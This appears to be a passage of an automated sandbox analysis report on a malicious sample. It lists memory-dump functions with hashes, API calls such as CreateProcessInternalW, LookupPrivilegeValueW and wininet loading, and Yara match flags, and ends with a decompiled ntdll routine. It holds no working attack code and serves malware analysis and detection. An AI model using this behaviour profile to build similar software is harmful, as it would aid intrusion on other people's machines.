                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 26c0987e4ac135bff9cb77e1bf1f57638fef80e31e0e8b230c3a2af35851752d
                                                                • Instruction ID: 1e6ac1a825be50a329762f2b979900c29704722a0548a026703263cb3cd44597
                                                                • Opcode Fuzzy Hash: 26c0987e4ac135bff9cb77e1bf1f57638fef80e31e0e8b230c3a2af35851752d
                                                                • Instruction Fuzzy Hash: 7F900261242085526545F19944045074007ABE0281791C052A2409A61C8666D85EE661
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9419f65fe3f137041d237003683f0b319d181806032e13b728e71fd474933daa
                                                                • Instruction ID: dc23b27b3169adc8104cfa61d23d98cadcc8f55cd658850a2948a48b438a702e
                                                                • Opcode Fuzzy Hash: 9419f65fe3f137041d237003683f0b319d181806032e13b728e71fd474933daa
                                                                • Instruction Fuzzy Hash: E690027120104813E111A1994504707000A9BD0281F91C452A1419669D9796C95AB161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 98847d7640efcbe8f61d9648a828bbd008aee4988366d276ba8981b29898ec5f
                                                                • Instruction ID: 161bc558b31b2708ebd47fffb863bc6c199e6d918688ef7466aaf59a0ff2ede3
                                                                • Opcode Fuzzy Hash: 98847d7640efcbe8f61d9648a828bbd008aee4988366d276ba8981b29898ec5f
                                                                • Instruction Fuzzy Hash: 9490026921304402E180B199540860A00069BD1242F91D455A100A669CCA55C86D6361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 63a6a06c269f1bad5632924b470179858af662bbd62576dc64a05d2c0cbb388f
                                                                • Instruction ID: db0c2f324526d6916e632c5841536966db648ce9dfe80342e5d66c14e9536ef8
                                                                • Opcode Fuzzy Hash: 63a6a06c269f1bad5632924b470179858af662bbd62576dc64a05d2c0cbb388f
                                                                • Instruction Fuzzy Hash: B890027131118802E110A199840470600069BD1241F51C451A1819669D87D5C8997162
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 663b1bfbaf668e7a4ea50a4570ed30b658dfb84cffd149b4181f63e68d0a9841
                                                                • Instruction ID: 1943ad45b85f3c9e09c973e5abcf76cf8379dd7c8f9c6e4a4b7d109c4bbe773c
                                                                • Opcode Fuzzy Hash: 663b1bfbaf668e7a4ea50a4570ed30b658dfb84cffd149b4181f63e68d0a9841
                                                                • Instruction Fuzzy Hash: 6F90027120104802E100A5D9540864600069BE0341F51D051A6019666EC7A5C8997171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 038696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fb7417369190933b57dd7be24315d03a4d63fa41f591540f18e2e9a27bccd324
                                                                • Instruction ID: 2041d55561a9bd60815efc4403c433d76d92037e31c26010f31a7cfcdf11ec42
                                                                • Opcode Fuzzy Hash: fb7417369190933b57dd7be24315d03a4d63fa41f591540f18e2e9a27bccd324
                                                                • Instruction Fuzzy Hash: 9590027120104C42E100A1994404B4600069BE0341F51C056A1119765D8755C8597561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 038696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: cc9dd6df5bf3b53976b2806a3d8d36771a8b61ca27c3f5001d4e262725d8fab7
                                                                • Instruction ID: a17a52f474c5b475d7a27f0659e5f68fca97a793f97a92ca8247f216f140bf86
                                                                • Opcode Fuzzy Hash: cc9dd6df5bf3b53976b2806a3d8d36771a8b61ca27c3f5001d4e262725d8fab7
                                                                • Instruction Fuzzy Hash: 169002712010CC02E110A199840474A00069BD0341F55C451A5419769D87D5C8997161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6822143139776c32bb1518e5617bbe23d62b0489ee80dd0a542a6ece003923b6
                                                                • Instruction ID: c3bfe9d1f88624f49a656943698fd9664af6c72e1a11ad9ec044988f5a28d3e6
                                                                • Opcode Fuzzy Hash: 6822143139776c32bb1518e5617bbe23d62b0489ee80dd0a542a6ece003923b6
                                                                • Instruction Fuzzy Hash: D290027120508C42E140B1994404A4600169BD0345F51C051A10597A5D9765CD5DB6A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 73bf020f88d2a1b6c08b51e85b7bfaf8f189781b02cc2b11eca51680e5dcfb98
                                                                • Instruction ID: ca23a0aaee844e20283f0f5de8ff9c1cb79f29d36a3340f5e3dd2342ee1ebf63
                                                                • Opcode Fuzzy Hash: 73bf020f88d2a1b6c08b51e85b7bfaf8f189781b02cc2b11eca51680e5dcfb98
                                                                • Instruction Fuzzy Hash: AE90027120104C02E180B199440464A00069BD1341F91C055A101A765DCB55CA5D77E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 038695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 61be2ddb36bf953be1824550985592a7acd9cee10976c744456a94da226eabd7
                                                                • Instruction ID: a146d5930dfb67a157d2dee68fc5457434e02119a23550ed0329ca5458880cc9
                                                                • Opcode Fuzzy Hash: 61be2ddb36bf953be1824550985592a7acd9cee10976c744456a94da226eabd7
                                                                • Instruction Fuzzy Hash: F19002A1202044035105B1994414616400B9BE0241B51C061E20096A1DC665C8997165
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b0f76a2a1b359f15875be3addc5373bdd9f32706ff244d82c3be1ea21204d151
                                                                • Instruction ID: 446b20fd14f0990c1fcd88010b27a52df44a092e0572ef64a49da79361d17955
                                                                • Opcode Fuzzy Hash: b0f76a2a1b359f15875be3addc5373bdd9f32706ff244d82c3be1ea21204d151
                                                                • Instruction Fuzzy Hash: 73900265211044031105E599070450700479BD5391351C061F200A661CD761C8696161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA88D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(02DA3526,?,02DA3C9F,02DA3C9F,?,02DA3526,?,?,?,?,?,00000000,00000000,?), ref: 02DA88CD
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D93B93), ref: 02DA890D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateFree
                                                                • String ID: .z`
                                                                • API String ID: 2488874121-1441809116
                                                                • Opcode ID: d8ee551d431861ff0c132791f448707b9cedd9e80127dc6f6d9ecdb5944b4012
                                                                • Instruction ID: 5ea9f6c515f2972313cbe0b5904769549f1559656df23f3d358e519a3866b688
                                                                • Opcode Fuzzy Hash: d8ee551d431861ff0c132791f448707b9cedd9e80127dc6f6d9ecdb5944b4012
                                                                • Instruction Fuzzy Hash: 06F08CB62002086BD714EFA9EC88EE777ADEF88350F218555FD089B201C631E8008AF0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA72F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 02DA7398
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: a3170ee7c55239da3fd2f3b77922aabcb9a750f6075950bac93418e63df38e9c
                                                                • Instruction ID: 1ac1e3a3c5cb695b06176991197ea463bbb85379285f7b3a974be2402a9d6ffa
                                                                • Opcode Fuzzy Hash: a3170ee7c55239da3fd2f3b77922aabcb9a750f6075950bac93418e63df38e9c
                                                                • Instruction Fuzzy Hash: 1B318EB6541604ABD711DF64C8B0FABB7B9EF48700F00851DFA5A9B241D774A946CBE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA72E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 87sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 02DA7398
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: 1aee32dc1a7fad49098b5d47f23d4bc5f9eda84ee04ad532d94b6859818b8b3b
                                                                • Instruction ID: 6306ba50317fdc437d0376622146bbbebf8442619163febd33e423e9f021a86d
                                                                • Opcode Fuzzy Hash: 1aee32dc1a7fad49098b5d47f23d4bc5f9eda84ee04ad532d94b6859818b8b3b
                                                                • Instruction Fuzzy Hash: 7931BF72541600ABE711EF64C8B1FABB7B9EF48700F048129FA695B381D775A906CFE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA894D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D93B93), ref: 02DA890D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID: .z`
                                                                • API String ID: 3298025750-1441809116
                                                                • Opcode ID: 3b9400cd3029f16b745976e5e44c286214ff15311656fdd616e494c20aecd6f2
                                                                • Instruction ID: 4c25661aafe6f803d7a1a3b46049a086bf9354865a45fb3eef8ceef831c3f6d7
                                                                • Opcode Fuzzy Hash: 3b9400cd3029f16b745976e5e44c286214ff15311656fdd616e494c20aecd6f2
                                                                • Instruction Fuzzy Hash: 46F08C722042046BDB14DFA89C68FE77BA8EF88310F104999FD9C5B342C531E910CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA88E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D93B93), ref: 02DA890D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID: .z`
                                                                • API String ID: 3298025750-1441809116
                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                • Instruction ID: b95da0335aa02516884004ec214dccd6354373601fb5f21cb633107884c08921
                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                • Instruction Fuzzy Hash: 50E012B2200208ABDB18EF99CC48EA777ADEF88750F018558BE085B241C630E910CAB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02D97280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D972DA
                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D972FB
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: 6242364d1d39fb105e909873f335ffe36d8bf3a77fb545fb0355dcaf9b4bdb5d
                                                                • Instruction ID: 1fd176d90a98929728abe2cdf5dffbb668e525b70e2d09fe22e7e86e39b90fd7
                                                                • Opcode Fuzzy Hash: 6242364d1d39fb105e909873f335ffe36d8bf3a77fb545fb0355dcaf9b4bdb5d
                                                                • Instruction Fuzzy Hash: 8B01A771A9022877EB21A6948C52FFEB76D9B00F51F144158FF04BA2C0EA946D0586F5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02D97253, Relevance: 3.0, APIs: 2, Instructions: 47threadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D972DA
                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D972FB
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: 544325075cd1956e68d7ae5776c679449290151af025703f7fc05e0bad29066c
                                                                • Instruction ID: dd2d779f45dc4918ec5f964dc4b79e30b7c3f3f093e5337cfcc40160f8e5c263
                                                                • Opcode Fuzzy Hash: 544325075cd1956e68d7ae5776c679449290151af025703f7fc05e0bad29066c
                                                                • Instruction Fuzzy Hash: 0FF046B2B9021976EB2165602C12FFDB309DB40B50F290069FF04EB3C0FB919D0686F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02D99B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D99BA2
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                • Instruction ID: 3e7c3be84924a7e101c71984a630dce2fd2700ebcef85e47800502919c6e20c0
                                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                • Instruction Fuzzy Hash: 980121B6D4020DABDF10DBE4DC91FDDB3B99B54308F108195E90997281F675EB14CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA8950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DA89A4
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                • Instruction ID: 90ff28a9308201afe843131b2a47a815b9cf29c5d861fa70103463053bf8930b
                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                • Instruction Fuzzy Hash: 5601AFB2210108ABCB58DF89DC90EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA7420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D9CCE0,?,?), ref: 02DA745C
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 3fbe0539843078ebb3f63e9b6130849855d2d7181e80f546e0c4fffbb1920b8b
                                                                • Instruction ID: e8faa58e478eb9f940285bcc5f7dd3e65dbb9664f6106a2985008e8caaec0bf8
                                                                • Opcode Fuzzy Hash: 3fbe0539843078ebb3f63e9b6130849855d2d7181e80f546e0c4fffbb1920b8b
                                                                • Instruction Fuzzy Hash: 5AE092337803043AE330669DAC12FA7B39DDB85B20F140026FB0DEB3C0D595F90146A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA7413, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D9CCE0,?,?), ref: 02DA745C
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: bb35da5f31cd7ba660aa6b3b9258eca160e2aeb809bd0946b8ce3aebb5327291
                                                                • Instruction ID: db3c9cb8c4b8a1f7980dbc45126e91c2a7e800997f13ad81ce7c9794c4ca0934
                                                                • Opcode Fuzzy Hash: bb35da5f31cd7ba660aa6b3b9258eca160e2aeb809bd0946b8ce3aebb5327291
                                                                • Instruction Fuzzy Hash: EBF0E5326902403AD3302AA84C13FEBBBA98B91B10F580269F649AB2C1D591B8014664
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA8A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D9CFB2,02D9CFB2,?,00000000,?,?), ref: 02DA8A70
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                • Instruction ID: 28ad4dfd6bc910f0782fd69f5a43ad364c56cf82b92ba396dc6076080aab09f7
                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                • Instruction Fuzzy Hash: ABE01AB16002086BDB14DF49CC84EE737ADEF88650F018154BE0857241C930E8108BF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA88A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(02DA3526,?,02DA3C9F,02DA3C9F,?,02DA3526,?,?,?,?,?,00000000,00000000,?), ref: 02DA88CD
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                • Instruction ID: 4840be313ccf3ca10f4548811564e6edeffb0b0f861909330c89d9e39ce0b659
                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                • Instruction Fuzzy Hash: 31E012B2200208ABDB18EF99CC44EA777ADEF88650F118558BE085B241C630F910CAB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02D9D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02D97C83,?), ref: 02D9D44B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                • Instruction ID: 78c9ff7268d7a5141d3eea06f45cdeacb1bf8f89d3a0d62601b692855744330b
                                                                • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                • Instruction Fuzzy Hash: 0CD05E717503042AEA10BAA49C02F2672CA9B45A04F494064F948963C3DA54E9008561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0386967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a2f186d526c56236b52fb7231f8f5823a1e8043fe6132be9de72594af11dfbe8
                                                                • Instruction ID: 73f9c7ed259b4f66a660e9a7c2f3ca6dbfe013d0adda1e53c4cd69c2b6ec112b
                                                                • Opcode Fuzzy Hash: a2f186d526c56236b52fb7231f8f5823a1e8043fe6132be9de72594af11dfbe8
                                                                • Instruction Fuzzy Hash: 4AB09B719015C5C5E611D7E0470871779057BD0741F17C0D1D2024755A4778C095F5B5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 038BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 53%
                                                                			E038BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0386CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E038B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E038B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                0x038bfdda
                                                                0x038bfde2
                                                                0x038bfde5
                                                                0x038bfdec
                                                                0x038bfdfa
                                                                0x038bfdff
                                                                0x038bfe0a
                                                                0x038bfe0f
                                                                0x038bfe17
                                                                0x038bfe1e
                                                                0x038bfe19
                                                                0x038bfe19
                                                                0x038bfe19
                                                                0x038bfe20
                                                                0x038bfe21
                                                                0x038bfe22
                                                                0x038bfe25
                                                                0x038bfe40

                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038BFDFA
                                                                Strings
